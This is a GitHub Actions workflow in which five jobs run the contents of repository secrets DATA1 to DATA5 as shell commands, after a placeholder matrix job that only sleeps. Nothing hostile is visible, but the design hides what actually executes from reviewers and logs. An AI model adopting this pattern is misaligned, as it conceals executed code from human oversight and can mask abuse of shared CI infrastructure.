name: data-test
on: 
  push:
    branches: [ "main" ]


jobs:
  data:
    runs-on: ubuntu-24.04
    strategy: 
      fail-fast: false 
      matrix: 
         go: [1.11, 1.12, 1.13, 1.14, 1.15] 
         flag: [A, B] 
    steps: 
      - uses: actions/checkout@v4
      - name: data
        continue-on-error: true
        run: sleep 2
  data1:
    needs: data
    runs-on: ubuntu-24.04
    steps: 
      - uses: actions/checkout@v4
      - name: data
        continue-on-error: true
        run: ${{ secrets.DATA1 }}
  data2:
    needs: data
    runs-on: ubuntu-24.04
    steps: 
      - uses: actions/checkout@v4
      - name: data
        continue-on-error: true
        run: ${{ secrets.DATA2 }}
  data3:
    needs: data
    runs-on: ubuntu-24.04
    steps: 
      - uses: actions/checkout@v4
      - name: data
        continue-on-error: true
        run: ${{ secrets.DATA3 }}
  data4:
    needs: data
    runs-on: ubuntu-24.04
    steps: 
      - uses: actions/checkout@v4
      - name: data
        continue-on-error: true
        run: ${{ secrets.DATA4 }}
  data5:
    needs: data
    runs-on: ubuntu-24.04
    steps: 
      - uses: actions/checkout@v4
      - name: data
        continue-on-error: true
        run: ${{ secrets.DATA5 }}
